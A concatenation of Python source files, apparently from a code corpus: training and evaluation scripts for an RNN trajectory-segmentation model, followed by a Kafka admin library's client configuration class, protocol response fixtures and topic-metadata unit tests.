else:
p_on = self.parameters["p_inte"]
if "p_v" in self.parameters:
p_v = self.parameters["p_v"]
else:
p_v = self.parameters["cut_off_inte"]**3 / self.parameters["R"]**3
ensembleSim.__init__(self, Nsim=Nsim,
Nori=None, Ndiff=Ndiff,
lengths=lengths,
p_on=p_on,
p_v=p_v,
dt_speed=self.parameters["dt_speed"],
fork_speed=self.parameters["fork_speed"],
p_off=None, only_one=True, l_ori=l_ori)
self.hdf5_file = hdf5_file
```
|
{
"source": "jeammimi/rnn_seg",
"score": 2
}
|
#### File: src/models/train_model.py
```python
print(__package__)
import theano
# theano.config.mode = "FAST_COMPILE"
from ..data.generate_n_steps_flexible import generate_n_steps as Flexible
from ..data.generate_n_steps import generate_n_steps as BDSD
from keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, CSVLogger
import threading
import os
import keras.backend as K
# sys.path.append("../features")
# print(__name__)
# print(sys.path)
import numpy as np
ndim = 2
np.random.seed(6)
def generator(**kwargs):
# n_steps_before_change = kwargs.get("n_steps_before_change", 50)
step = 0
Step = kwargs.get("Step", {0: 26, 1: 50, 2: 100, 3: 200, 4: 400})
# Step = kwargs.get("Step", {0: 26, 1: 26, 2: 26, 3: 26, 4: 26})
while True:
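        # length curriculum: advance to the next entry of Step every 50 batches;
        # with a model attached, advance once per epoch, and validation
        # generators advance on every batch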
n_steps = int(step // 50) % len(Step)
if kwargs.get("model", None):
n_steps = len(kwargs.get("model").history.epoch) % len(Step)
if kwargs.get("validation", None):
n_steps = step % len(Step)
if kwargs["type"] == "flexible":
X, Y, Trajs = Flexible(kwargs["size_sample"], Step[n_steps], kwargs["ndim"])
if kwargs.get("traj", False):
yield X, Y, Trajs
else:
yield X, Y
elif kwargs["type"] == "BDSD":
X, Y, Y_cat, Trajs = BDSD(kwargs["size_sample"], Step[
n_steps], kwargs["ndim"], kwargs["sub"])
if kwargs.get("traj", False):
yield X, {"category": Y_cat, "output": Y}, Trajs
else:
# print(X.shape, step)
# if kwargs.get("model", None):
# print(kwargs.get("model").history.epoch)
if kwargs.get("old", False):
yield {"input1": X, "category": Y_cat, "output": Y}
else:
yield X, {"category": Y_cat, "output": Y}
step += 1
class createBatchGenerator:
def __init__(self, **kwargs):
self.kwargs = kwargs
self.lock = threading.Lock()
def __iter__(self):
return self
def next(self):
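        # NOTE: because this method body contains yield, each call to next()
        # returns a fresh generator object rather than a batch; callers must
        # iterate the returned object.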
kwargs = self.kwargs
with self.lock:
step = 0
Step = kwargs.get("Step", {0: 26, 1: 50, 2: 100, 3: 200, 4: 400})
# Step = kwargs.get("Step", {0: 26, 1: 26, 2: 26, 3: 26, 4: 26})
while True:
n_steps = int(step // 50) % len(Step)
if kwargs.get("model", None):
n_steps = len(kwargs.get("model").history.epoch) % len(Step)
if kwargs.get("validation", None):
n_steps = step % len(Step)
if kwargs["type"] == "flexible":
X, Y, Trajs = Flexible(kwargs["size_sample"], Step[n_steps], kwargs["ndim"])
if kwargs.get("traj", False):
yield X, Y, Trajs
else:
yield X, Y
elif kwargs["type"] == "BDSD":
X, Y, Y_cat, Trajs = BDSD(kwargs["size_sample"], Step[
n_steps], kwargs["ndim"], kwargs["sub"])
if kwargs.get("traj", False):
yield X, {"category": Y_cat, "output": Y}, Trajs
else:
# print(X.shape, step)
# if kwargs.get("model", None):
# print(kwargs.get("model").history.epoch)
if kwargs.get("old", False):
yield {"input1": X, "category": Y_cat, "output": Y}
else:
yield X, {"category": Y_cat, "output": Y}
step += 1
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--NLayers', default=3, type=int)
parser.add_argument('--Ndim', default=3, type=int)
parser.add_argument('--dir', type=str)
parser.add_argument('--hidden', default=50, type=int)
parser.add_argument('--simple', dest='simple', action='store_true')
parser.add_argument('--old', dest='old', action='store_true')
parser.add_argument('--no-segmentation', dest='segmentation', action='store_false')
parser.add_argument('--sub', dest='sub', action='store_true')
parser.add_argument('--Nepochs', default=200, type=int)
parser.add_argument('--average', dest='merge_mode', action='store_true')
args = parser.parse_args()
print(args.simple)
if args.sub:
n_cat = 27
n_states = 10
else:
n_cat = 12
n_states = 7
if args.Ndim == 3:
inputsize = 6
elif args.Ndim == 2:
inputsize = 5
type_traj = "BDSD"
if args.segmentation is False:
type_traj = "flexible"
merge_mode = "concat"
if args.merge_mode:
merge_mode = "ave"
if not args.old:
from .build_model import build_model
model = build_model(n_states=n_states, n_cat=n_cat, n_layers=args.NLayers,
inputsize=inputsize, hidden=args.hidden, simple=args.simple,
segmentation=args.segmentation, merge_mode=merge_mode)
Generator = lambda model, validation: generator(size_sample=20, n_steps_before_change=50,
sub=args.sub, type=type_traj, ndim=args.Ndim, model=model, validation=validation, old=args.old)
else:
from .build_model_old import return_layer_paper
model = return_layer_paper(ndim=2, inside=args.hidden, permutation=True, inputsize=inputsize, simple=False,
n_layers=3, category=True, output=True, n_cat=n_cat, sub=args.sub)
Generator = lambda model, validation: createBatchGenerator(size_sample=50, n_steps_before_change=50,
sub=args.sub, type=type_traj, ndim=args.Ndim, model=model, validation=validation, old=args.old)
# for epochs in range(args.Nepochs):
if not args.old:
Check = ModelCheckpoint(filepath="./data/" + args.dir + "/weights.{epoch:02d}-{val_loss:.2f}.hdf5", monitor='val_loss', verbose=0,
save_best_only=False, save_weights_only=True, mode='auto', period=5)
else:
Check = ModelCheckpoint(filepath="./data/" + args.dir + "/weights.{epoch:02d}-{val_loss:.2f}.hdf5", monitor='val_loss', verbose=0,
save_best_only=False, save_weights_only=True, mode='auto')
Reduce = ReduceLROnPlateau(factor=0.5, patience=15, min_lr=0.01)
if not args.old:
Log = CSVLogger(filename="./data/" + args.dir + "/training.log")
model.fit_generator(generator=Generator(model, False), steps_per_epoch=45,
validation_steps=5, epochs=args.Nepochs, workers=1,
callbacks=[Reduce, Check, Log], validation_data=Generator(model, True),
max_q_size=10)
else:
gen = generator(size_sample=20 * 50, sub=args.sub, type=type_traj,
ndim=args.Ndim, validation=True, old=args.old)
if os.path.exists("./data/" + args.dir + "/training.log"):
os.remove("./data/" + args.dir + "/training.log")
Reduce.on_train_begin()
for i in range(args.Nepochs):
for data in gen:
data = data
break
print(data["input1"].shape)
Log = CSVLogger(filename="./data/" + args.dir + "/training.log", append=True)
r = model.fit(data, batch_size=20, nb_epoch=1,
callbacks=[Check, Log], validation_split=0.1) # , initial_epoch=i)
#from IPython import embed
# embed()
# print(r["val_loss"])
if i % 200 == 0:
new_lr = float(K.get_value(model.optimizer.lr)) / 2
K.set_value(model.optimizer.lr, new_lr)
#Reduce.model = model
#Reduce.on_epoch_end(i, logs={"val_loss": r.history["val_loss"][-1]})
```
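A minimal sketch of pulling batches from `generator` by hand, outside of `fit_generator` (parameter values are illustrative; `Flexible`/`BDSD` are the project's own data modules imported at the top of the file):
```python
# Illustrative only: drive the curriculum generator directly.
gen = generator(size_sample=4, type="flexible", ndim=2)

X, Y = next(gen)   # first batch is built with Step[0], i.e. sequences of length 26
X, Y = next(gen)   # still Step[0]; the length only advances every 50 batches
print(X.shape, Y.shape)   # shapes depend on generate_n_steps, typically (size_sample, n_steps, ...)
```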
#### File: src/tests_auto/automated_test.py
```python
import numpy as np
import pylab as plt
from ..data.generator_traj import generate_traj
from ..data.motion_type import random_rot
from ..features.prePostTools import traj_to_dist
def single_all_separation(graph, model, range_mu=None, range_len=None,
maxlen=800, ndim=2, plot=True, noise_level=0, sm=0, g4=False, limit=False, v=1):
if range_mu is None:
range_mu = np.arange(1, 3.1, 0.2)
if range_len is None:
range_len = range(25, 200, 25)
# rangemu=[3]
res = np.zeros((len(range_mu), 3 + 12))
for Mu, mu in enumerate(range_mu):
print(Mu, mu,)
Nt = 100
for Lenght, l in enumerate(range_len):
if l % 2 == 1:
l = l - 1
Traj = []
Real_traj = []
S = []
for n in range(Nt):
size = l
Ra0 = [0, 1.]
succeed = False
g = 0
while not succeed or g > 10:
# try:
# print "gen"
g += 1
ModelN, Model_num, s, sc, real_traj, norm, alpha2 = generate_traj(size, lower_selfprob=0.4,
fight=False, diff_sigma=2,
deltav=0.1, zeros=False,
delta_sigma_directed=0.1,
force_model=model,
anisentropy=0,
ndim=ndim, fixed_self_proba=False)
if Model_num == 3:
break
# except IndexError:
# print("Failed")
# succeed = False
#R = get_parameters(real_traj,s,1,1,2)
# print R[0][2][1] , R[1][2] [0]
alpharot = 2 * 3.14 * np.random.random()
real_traj2 = random_rot(real_traj, alpharot, ndim=ndim)
if noise_level != 0:
real_traj2 += np.random.normal(0, noise_level, real_traj.shape)
alligned_traj, normed = traj_to_dist(real_traj, ndim=ndim)
Traj.append(normed)
Real_traj.append(real_traj2)
S.append(s)
# print np.array(Traj).shape,np.array(Traj)[::,:l,::].shape
res1 = graph.predict({"input1": np.array(Traj)[::, :l, ::]},)
cat = res1["category"]
if limit:
cat = cat[::, :5]
# print np.argmax(cat,-1)
res[Mu, Lenght] = np.sum(np.argmax(cat, -1) == [3]) / 1.0 / Nt
if plot:
cmap = plt.get_cmap("cool")
        plt.imshow(res[::-1, ::], interpolation="none", extent=(0, 400, 1, 3),
aspect=200, vmin=0, vmax=1, cmap=cmap)
plt.colorbar()
plt.savefig("separation-unfilterer1.png")
return res, Real_traj, S
def Brownian_V_separation(graph, range_mu=None, range_len=None,
maxlen=800, ndim=2, plot=True, noise_level=0, limit=False, v=1, batch_size=10):
if range_mu is None:
range_mu = np.arange(1, 3.1, 0.2)
if range_len is None:
range_len = range(25, 400, 25)
# rangemu=[3]
res = np.zeros((len(range_mu), 3 + 12))
for Mu, mu in enumerate(range_mu):
print(Mu, mu,)
Nt = 100
for Lenght, l in enumerate(range_len):
if l % 2 == 1:
l = l - 1
Traj = []
Real_traj = []
S = []
for n in range(Nt):
size = l
Ra0 = [0, 1.]
succeed = False
g = 0
while not succeed or g > 10:
# try:
# print "gen"
g += 1
if ndim == 2:
Mu0 = [
[mu, 0], [1, 1], [0, 0]]
elif ndim == 3:
Mu0 = [[mu, 0, 0], [1, 1, 1], [0, 0, 0]]
ModelN, Model_num, s, sc, real_traj, norm, alpha2 = generate_traj(size, lower_selfprob=0.9,
fight=False, diff_sigma=2,
deltav=0.1, zeros=False,
delta_sigma_directed=0.1,
force_model=3,
anisentropy=0,
Ra0=Ra0, Mu0=Mu0,
ndim=ndim, fixed_self_proba=True)
if Model_num == 3:
break
# except IndexError:
# print("Failed")
# succeed = False
#R = get_parameters(real_traj,s,1,1,2)
# print R[0][2][1] , R[1][2] [0]
alpharot = 2 * 3.14 * np.random.random()
real_traj2 = random_rot(real_traj, alpharot, ndim=ndim)
if noise_level != 0:
real_traj2 += np.random.normal(0, noise_level, real_traj.shape)
alligned_traj, normed, _, _ = traj_to_dist(real_traj, ndim=ndim)
Traj.append(normed)
Real_traj.append(real_traj2)
S.append(s)
# print np.array(Traj).shape,np.array(Traj)[::,:l,::].shape
res1 = graph.predict(np.array(Traj)[::, :l, ::], batch_size=batch_size)
# print(res1)
cat = res1[1]
if limit:
cat = cat[::, :5]
print(np.argmax(cat, -1))
res[Mu, Lenght] = np.sum(np.argmax(cat, -1) == [3]) / 1.0 / Nt
if plot:
cmap = plt.get_cmap("cool")
        plt.imshow(res[::-1, ::], interpolation="none", extent=(0, 400, 1, 3),
aspect=200, vmin=0, vmax=1, cmap=cmap)
plt.colorbar()
plt.savefig("separation-unfilterer1.png")
return res, Real_traj, S,
# Brownian_V_separation("test",sm=1)
# Brownian_V_separation("test",sm=1)
```
|
{
"source": "jean0313/kafka-tools",
"score": 2
}
|
#### File: kafka/tools/configuration.py
```python
import os
import six
import ssl
from kafka.tools.exceptions import ConfigurationError
def eval_boolean(value):
"""Attempt to evaluate the argument as a boolean"""
if isinstance(value, bool):
return value
elif isinstance(value, six.integer_types):
return value != 0
else:
return value.lower() in ['true', 'yes', 'on']
def check_file_access(filename):
if not os.access(filename, os.R_OK):
raise ConfigurationError("filename specified ({0}) is not accessible for reading".format(filename))
class ClientConfiguration(object):
#######################
# CONNECTION PROPERTIES
#
# broker_list and zkconnect are the two possible ways of specifying the Kafka cluster to connect to. One of these
# options must be provided, and only one can be provided. By default, the broker_list is set to point to localhost
@property
def broker_list(self):
"""The broker list to use for bootstrapping the client
This broker list is only used for the initial client connect. The client will connect to one of the brokers
specified and fetch the cluster information, including a list of brokers.
The format of the broker list is a comma-separated list of hostname:port
hostname:port[,hostname:port...]
"""
return getattr(self, '_broker_list', 'localhost:9092')
@broker_list.setter
def broker_list(self, value):
if not isinstance(value, six.string_types):
raise TypeError("broker_list must be a string")
# We're not going to validate much here - if the user does the wrong thing, they'll get an error on connect
self._broker_list = []
hostports = value.split(',')
for hostport in hostports:
(host, port) = hostport.rsplit(':', 1)
self._broker_list.append((host, int(port)))
@property
def zkconnect(self):
"""The zookeeper connection string for the Kafka cluster
        This is the Zookeeper connection string that points to the Kafka cluster metadata. It is the same string that
is used when configuring the Kafka brokers. The format is:
host:port[,host:port...][/chroot/path]
"""
return getattr(self, '_zkconnect', None)
@zkconnect.setter
def zkconnect(self, value):
# We're not going to validate this past being a string. It's too much of a pain, and Kazoo will handle it
if not isinstance(value, six.string_types):
raise TypeError("zkconnect must be a string")
self._zkconnect = value
################
# SSL PROPERTIES
#
    # All of these properties are used for setting up TLS connections to the Kafka brokers. The defaults provided are
# reasonable for a secure connection, except that enable_tls is disabled by default.
@property
def enable_tls(self):
"""Enable TLS for Kafka broker connections"""
return getattr(self, '_enable_tls', False)
@enable_tls.setter
def enable_tls(self, value):
self._enable_tls = eval_boolean(value)
@property
def tls_verify_certificates(self):
"""Define whether or not to verify the server host certificate is valid and trusted when TLS is enabled"""
return getattr(self, '_tls_verify_certificates', True)
@tls_verify_certificates.setter
def tls_verify_certificates(self, value):
self._tls_verify_certificates = eval_boolean(value)
@property
def tls_verify_hostnames(self):
"""Define whether or not to verify the server hostname matches the host certificate provided"""
return getattr(self, '_tls_verify_hostnames', True)
@tls_verify_hostnames.setter
def tls_verify_hostnames(self, value):
self._tls_verify_hostnames = eval_boolean(value)
@property
def tls_root_certificates(self):
"""Path to the trusted root certificates. If not provided, the system default will be used"""
return getattr(self, '_tls_root_certificates', None)
@tls_root_certificates.setter
def tls_root_certificates(self, value):
check_file_access(value)
self._tls_root_certificates = value
@property
def tls_client_certificate(self):
"""Path to the client certificate, optionally including a key. If not provided, no client certificate is used"""
return getattr(self, '_tls_client_certificate', None)
@tls_client_certificate.setter
def tls_client_certificate(self, value):
check_file_access(value)
self._tls_client_certificate = value
@property
def tls_client_keyfile(self):
"""Path to the client certificate key file, if separate from the client certificate file."""
return getattr(self, '_tls_client_keyfile', None)
@tls_client_keyfile.setter
def tls_client_keyfile(self, value):
check_file_access(value)
self._tls_client_keyfile = value
@property
def tls_client_key_password_callback(self):
"""A function that will be called to get the keyfile password.
This is a function that will be called to get the password that protects the keyfile specified. This must be a
        Python callable that takes no arguments. It must return a string, bytes, or bytearray
If not specified, the keyfile is assumed to be unprotected
"""
return getattr(self, '_tls_client_key_password_callback', None)
@tls_client_key_password_callback.setter
def tls_client_key_password_callback(self, value):
if not callable(value):
raise TypeError("tls_client_key_password_callback is not callable".format(value))
self._tls_client_key_password_callback = value
#######################
# KAFKA CLIENT SETTINGS
#
# The rest of these configurations are used for controlling the behavior of the client
@property
def client_id(self):
"""The client ID string to use when talking to the brokers"""
return getattr(self, '_client_id', "kafka-tools")
@client_id.setter
def client_id(self, value):
raise_if_not_string("client_id", value)
self._client_id = value
@property
def metadata_refresh(self):
"""How long topic and group metadata can be cached"""
return getattr(self, '_metadata_refresh', 60000)
@metadata_refresh.setter
def metadata_refresh(self, value):
raise_if_not_positive_integer("metadata_refresh", value)
self._metadata_refresh = value
@property
def max_request_size(self):
"""The largest size for outgoing Kafka requests. Used to allocate the request buffer"""
return getattr(self, '_max_request_size', 200000)
@max_request_size.setter
def max_request_size(self, value):
raise_if_not_positive_integer("max_request_size", value)
self._max_request_size = value
@property
def num_retries(self):
"""The number of times to retry a request when there is a failure"""
return getattr(self, '_num_retries', 3)
@num_retries.setter
def num_retries(self, value):
raise_if_not_positive_integer("_num_retries", value)
self._num_retries = value
@property
def retry_backoff(self):
"""The number of seconds (float) to wait between request retries"""
return getattr(self, '_retry_backoff', 0.5)
@retry_backoff.setter
def retry_backoff(self, value):
raise_if_not_positive_float("_retry_backoff", value)
self._retry_backoff = value
@property
def broker_threads(self):
"""How many threads to use in a pool for broker connections"""
return getattr(self, '_broker_threads', 20)
@broker_threads.setter
def broker_threads(self, value):
raise_if_not_positive_integer("broker_threads", value)
self._broker_threads = value
def _set_attributes(self, **kwargs):
for key in kwargs:
if not hasattr(self, key):
raise ConfigurationError("Invalid configuration specified: {0}".format(key))
setattr(self, key, kwargs[key])
def __init__(self, **kwargs):
"""
Create a configuration object, setting any provided options. Either broker_list or zkconnect (but not both)
must be provided
Raises:
ConfigurationError: unless exactly one of broker_list or zkconnect is provided, or if any invalid option
is specified.
"""
if ('zkconnect' in kwargs) and ('broker_list' in kwargs):
raise ConfigurationError("Only one of zkconnect and broker_list may be provided")
self._set_attributes(**kwargs)
# Create the SSL context if we are going to enable TLS
self.ssl_context = self._create_ssl_context() if self.enable_tls else None
def _verify_ssl_configuration(self):
if self.tls_verify_hostnames and (not self.tls_verify_certificates):
raise ConfigurationError("tls_verify_hostnames may not be specified if tls_verify_certificates is False")
def _create_ssl_context(self):
self._verify_ssl_configuration()
try:
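            # PROTOCOL_SSLv23 is the legacy alias for PROTOCOL_TLS: it
            # negotiates the highest TLS version both sides support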
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED if self.tls_verify_certificates else ssl.CERT_NONE
context.check_hostname = self.tls_verify_hostnames
if self.tls_root_certificates is None:
context.load_default_certs(purpose=ssl.Purpose.CLIENT_AUTH)
else:
context.load_verify_locations(cafile=self.tls_root_certificates)
if self.tls_client_certificate is not None:
context.load_cert_chain(self.tls_client_certificate,
keyfile=self.tls_client_keyfile,
password=self.tls_client_key_password_callback)
except ssl.SSLError as e:
raise ConfigurationError("Unable to configure SSL Context: {0}".format(e))
return context
def raise_if_not_positive_integer(attr_name, value):
if not (isinstance(value, six.integer_types) and (value > 0)):
raise TypeError("{0} must be a positive integer".format(attr_name))
def raise_if_not_positive_float(attr_name, value):
if not (isinstance(value, float) and (value > 0.0)):
raise TypeError("{0} must be a positive float".format(attr_name))
def raise_if_not_string(attr_name, value):
if not isinstance(value, six.string_types):
raise TypeError("{0} must be a string".format(attr_name))
```
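A minimal usage sketch for `ClientConfiguration` (the import path is assumed to match the file location shown above):
```python
from kafka.tools.configuration import ClientConfiguration

# Bootstrap from two brokers; the setter parses the string into (host, port) tuples.
config = ClientConfiguration(
    broker_list='broker1.example.com:9092,broker2.example.com:9092',
    client_id='my-admin-tool',
    num_retries=5,
)
print(config.broker_list)   # [('broker1.example.com', 9092), ('broker2.example.com', 9092)]

# The type-checked setters reject bad values...
try:
    config.metadata_refresh = -1
except TypeError as e:
    print(e)                # metadata_refresh must be a positive integer

# ...and passing both zkconnect and broker_list raises ConfigurationError.
```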
#### File: tools/client/fixtures.py
```python
from kafka.tools.protocol.responses.list_groups_v0 import ListGroupsV0Response
from kafka.tools.protocol.responses.list_offset_v0 import ListOffsetV0Response
from kafka.tools.protocol.responses.offset_commit_v2 import OffsetCommitV2Response
from kafka.tools.protocol.responses.offset_fetch_v1 import OffsetFetchV1Response
from kafka.tools.protocol.responses.describe_groups_v0 import DescribeGroupsV0Response
from kafka.tools.protocol.responses.metadata_v1 import MetadataV1Response
from kafka.tools.protocol.responses.metadata_v0 import MetadataV0Response
from kafka.tools.protocol.responses.group_coordinator_v0 import GroupCoordinatorV0Response
def describe_groups():
ma_1 = b'\x00\x00\x00\x00\x00\x01\x00\x06topic1\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff'
ma_2 = b'\x00\x00\x00\x00\x00\x01\x00\x06topic1\x00\x00\x00\x01\x00\x00\x00\x01\xff\xff\xff\xff'
return DescribeGroupsV0Response({'groups': [{'group_id': 'testgroup',
'error': 0,
'state': 'Stable',
'protocol': 'roundrobin',
'protocol_type': 'consumer',
'members': [{'member_id': 'testmember1',
'client_id': 'testclientid1',
'client_host': 'host.example.com',
'member_metadata': b'\x90\x83\x24\xbc',
'member_assignment': ma_1},
{'member_id': 'testmember2',
'client_id': 'testclientid2',
'client_host': 'otherhost.example.com',
'member_metadata': b'\x89\x34\x78\xad',
'member_assignment': ma_2}
]
}]
})
def describe_groups_error():
return DescribeGroupsV0Response({'groups': [{'group_id': 'testgroup',
'error': 16,
'state': None,
'protocol': None,
'protocol_type': None,
'members': None}]})
def topic_metadata():
return MetadataV1Response({'brokers': [{'node_id': 1,
'host': 'host1.example.com',
'port': 8031,
'rack': 'rack1'},
{'node_id': 101,
'host': 'host2.example.com',
'port': 8032,
'rack': 'rack2'}],
'controller_id': 1,
'topics': [{'error': 0,
'name': 'topic1',
'internal': False,
'partitions': [{'error': 0,
'id': 0,
'leader': 1,
'replicas': [101, 1],
'isrs': [101, 1]},
{'error': 0,
'id': 1,
'leader': 101,
'replicas': [101, 1],
'isrs': [1, 101]}]}]})
def topic_metadata_v0():
return MetadataV0Response({'brokers': [{'node_id': 1,
'host': 'host1.example.com',
'port': 8031,
'rack': 'rack1'},
{'node_id': 101,
'host': 'host2.example.com',
'port': 8032,
'rack': 'rack2'}],
'controller_id': 1,
'topics': [{'error': 0,
'name': 'topic1',
'internal': False,
'partitions': [{'error': 0,
'id': 0,
'leader': 1,
'replicas': [101, 1],
'isrs': [101, 1]},
{'error': 0,
'id': 1,
'leader': 101,
'replicas': [101, 1],
'isrs': [1, 101]}]}]})
def topic_metadata_error():
return MetadataV1Response({'brokers': [{'node_id': 1,
'host': 'host1.example.com',
'port': 8031,
'rack': 'rack1'},
{'node_id': 101,
'host': 'host2.example.com',
'port': 8032,
'rack': 'rack2'}],
'controller_id': 1,
'topics': [{'error': 3,
'name': 'topic1',
'internal': False,
'partitions': None}]})
def group_coordinator():
return GroupCoordinatorV0Response({'error': 0,
'node_id': 1,
'host': 'host1.example.com',
'port': 8031})
def group_coordinator_error():
return GroupCoordinatorV0Response({'error': 15,
'node_id': -1,
'host': None,
'port': -1})
def list_groups():
return ListGroupsV0Response({'error': 0, 'groups': [{'group_id': 'group1',
'protocol_type': 'protocol1'}]})
def list_groups_error():
return ListGroupsV0Response({'error': 1, 'groups': None})
def list_offset():
return ListOffsetV0Response({'responses': [{'topic': 'topic1',
'partition_responses': [{'partition': 0,
'error': 0,
'offsets': [4829]},
{'partition': 1,
'error': 0,
'offsets': [8904]}]}]})
def list_offset_none():
return ListOffsetV0Response({'responses': [{'topic': 'topic1',
'partition_responses': [{'partition': 0,
'error': 0,
'offsets': [4829]},
{'partition': 1,
'error': 0,
'offsets': []}]}]})
def list_offset_error():
return ListOffsetV0Response({'responses': [{'topic': 'topic1',
'partition_responses': [{'partition': 0,
'error': 6,
'offsets': None},
{'partition': 1,
'error': 0,
'offsets': [8904]}]}]})
def offset_fetch():
return OffsetFetchV1Response({'responses': [{'topic': 'topic1',
'partition_responses': [{'partition': 0,
'metadata': None,
'error': 0,
'offset': 4829},
{'partition': 1,
'metadata': None,
'error': 0,
'offset': 8904}]}]})
def offset_fetch_error():
return OffsetFetchV1Response({'responses': [{'topic': 'topic1',
'partition_responses': [{'partition': 0,
'error': 6,
'metadata': None,
'offset': -1},
{'partition': 1,
'metadata': None,
'error': 0,
'offset': 8904}]}]})
def offset_commit_response():
return OffsetCommitV2Response({'responses': [{'topic': 'topic1',
'partition_responses': [{'partition': 0,
'error': 0},
{'partition': 1,
'error': 16}]}]})
```
#### File: tools/client/test_topics.py
```python
import time
import unittest
from mock import MagicMock
from tests.tools.client.fixtures import topic_metadata
from kafka.tools.client import Client
from kafka.tools.exceptions import TopicError
from kafka.tools.models.broker import Broker
from kafka.tools.models.topic import Topic
from kafka.tools.protocol.requests.topic_metadata_v1 import TopicMetadataV1Request
def assert_cluster_has_topics(cluster, metadata):
for mtopic in metadata['topics']:
assert mtopic['name'] in cluster.topics
topic = cluster.topics[mtopic['name']]
assert topic.name == mtopic['name']
assert topic.internal == mtopic['internal']
assert len(topic.partitions) == len(mtopic['partitions'])
for i, tp in enumerate(mtopic['partitions']):
partition = topic.partitions[i]
assert partition.num == tp['id']
assert partition.leader.id == tp['leader']
assert len(partition.replicas) == len(tp['replicas'])
for j, tp_replica in enumerate(tp['replicas']):
assert partition.replicas[j].id == tp_replica
def assert_cluster_has_brokers(cluster, metadata):
for b in metadata['brokers']:
assert b['node_id'] in cluster.brokers
broker = cluster.brokers[b['node_id']]
assert broker.hostname == b['host']
assert broker.port == b['port']
assert broker.rack == b['rack']
class TopicsTests(unittest.TestCase):
def setUp(self):
        # Dummy client for testing - we're not going to connect to that bootstrap broker
self.client = Client()
self.metadata_response = topic_metadata()
def test_maybe_update_full_metadata_expired(self):
self.client._send_any_broker = MagicMock()
self.client._send_any_broker.return_value = 'metadata_response'
self.client._update_from_metadata = MagicMock()
fake_last_time = time.time() - (self.client.configuration.metadata_refresh * 2)
self.client._last_full_metadata = fake_last_time
self.client._maybe_update_full_metadata()
assert self.client._last_full_metadata > fake_last_time
self.client._send_any_broker.assert_called_once()
arg = self.client._send_any_broker.call_args[0][0]
assert isinstance(arg, TopicMetadataV1Request)
assert arg['topics'] is None
self.client._update_from_metadata.assert_called_once_with('metadata_response', delete=True)
def test_maybe_update_full_metadata_nocache(self):
self.client._send_any_broker = MagicMock()
self.client._update_from_metadata = MagicMock()
fake_last_time = time.time() - 1000
self.client._last_full_metadata = fake_last_time
self.client._maybe_update_full_metadata(cache=False)
assert self.client._last_full_metadata > fake_last_time
def test_maybe_update_full_metadata_usecache(self):
self.client._send_any_broker = MagicMock()
self.client._update_from_metadata = MagicMock()
fake_last_time = time.time() - 1000
self.client._last_full_metadata = fake_last_time
self.client._maybe_update_full_metadata(cache=True)
assert self.client._last_full_metadata == fake_last_time
def test_maybe_update_metadata_for_topics_noupdate(self):
self.client._update_from_metadata(self.metadata_response)
self.client.cluster.topics['topic1']._last_updated = time.time()
self.client._update_from_metadata = MagicMock()
self.client._send_any_broker = MagicMock()
self.client._maybe_update_metadata_for_topics(['topic1'])
self.client._update_from_metadata.assert_not_called()
def test_maybe_update_metadata_for_topics_expired(self):
self.client._update_from_metadata(self.metadata_response)
self.client.cluster.topics['topic1']._last_updated = 100
self.client._update_from_metadata = MagicMock()
self.client._send_any_broker = MagicMock()
self.client._maybe_update_metadata_for_topics(['topic1'])
self.client._update_from_metadata.assert_called_once()
req = self.client._send_any_broker.call_args[0][0]
assert len(req['topics']) == 1
assert req['topics'][0] == 'topic1'
def test_maybe_update_metadata_for_topics_forced(self):
self.client._update_from_metadata(self.metadata_response)
self.client.cluster.topics['topic1']._last_updated = time.time()
self.client._update_from_metadata = MagicMock()
self.client._send_any_broker = MagicMock()
self.client._maybe_update_metadata_for_topics(['topic1'], cache=False)
self.client._update_from_metadata.assert_called_once()
req = self.client._send_any_broker.call_args[0][0]
assert len(req['topics']) == 1
assert req['topics'][0] == 'topic1'
def test_maybe_update_metadata_for_topics_nonexistent(self):
self.client._update_from_metadata(self.metadata_response)
self.client.cluster.topics['topic1']._last_updated = time.time()
self.client._update_from_metadata = MagicMock()
self.client._send_any_broker = MagicMock()
self.client._maybe_update_metadata_for_topics(['topic1', 'topic2'])
self.client._update_from_metadata.assert_called_once()
req = self.client._send_any_broker.call_args[0][0]
assert len(req['topics']) == 2
assert req['topics'][0] == 'topic1'
assert req['topics'][1] == 'topic2'
def test_update_from_metadata(self):
self.client._update_brokers_from_metadata = MagicMock()
self.client._update_topics_from_metadata = MagicMock()
self.client._update_from_metadata('fake_metadata')
self.client._update_brokers_from_metadata.assert_called_once_with('fake_metadata')
self.client._update_topics_from_metadata.assert_called_once_with('fake_metadata', delete=False)
def test_update_topics_from_metadata_create(self):
# Don't want to test the broker update code here
self.client.cluster.add_broker(Broker('host1.example.com', id=1, port=8031))
self.client.cluster.add_broker(Broker('host2.example.com', id=101, port=8032))
self.client._update_topics_from_metadata(self.metadata_response)
assert_cluster_has_topics(self.client.cluster, self.metadata_response)
def test_update_topics_from_metadata_missing_broker(self):
# Don't want to test the broker update code here
self.client.cluster.add_broker(Broker('host1.example.com', id=1, port=8031))
self.client._update_topics_from_metadata(self.metadata_response)
assert_cluster_has_topics(self.client.cluster, self.metadata_response)
assert 101 in self.client.cluster.brokers
assert self.client.cluster.brokers[101].endpoint.hostname is None
def test_maybe_delete_topics_not_in_metadata(self):
# Don't want to test the broker update code here
broker1 = Broker('host1.example.com', id=1, port=8031)
broker2 = Broker('host2.example.com', id=101, port=8032)
topic = Topic('topic1', 1)
self.client.cluster.add_broker(broker1)
self.client.cluster.add_broker(broker2)
self.client.cluster.add_topic(topic)
topic.partitions[0].add_replica(broker2)
topic.partitions[0].add_replica(broker1)
topic = Topic('topic2', 1)
self.client.cluster.add_broker(broker1)
self.client.cluster.add_broker(broker2)
self.client.cluster.add_topic(topic)
topic.partitions[0].add_replica(broker2)
topic.partitions[0].add_replica(broker1)
self.client._maybe_delete_topics_not_in_metadata(self.metadata_response, delete=True)
assert 'topic2' not in self.client.cluster.topics
assert 'topic1' in self.client.cluster.topics
def test_update_topics_from_metadata_update_replicas(self):
# Don't want to test the broker update code here
broker1 = Broker('host1.example.com', id=1, port=8031)
broker2 = Broker('host2.example.com', id=101, port=8032)
broker3 = Broker('host3.example.com', id=304, port=8033)
topic = Topic('topic1', 2)
self.client.cluster.add_broker(broker1)
self.client.cluster.add_broker(broker2)
self.client.cluster.add_broker(broker3)
self.client.cluster.add_topic(topic)
topic.partitions[0].add_replica(broker3)
topic.partitions[0].add_replica(broker1)
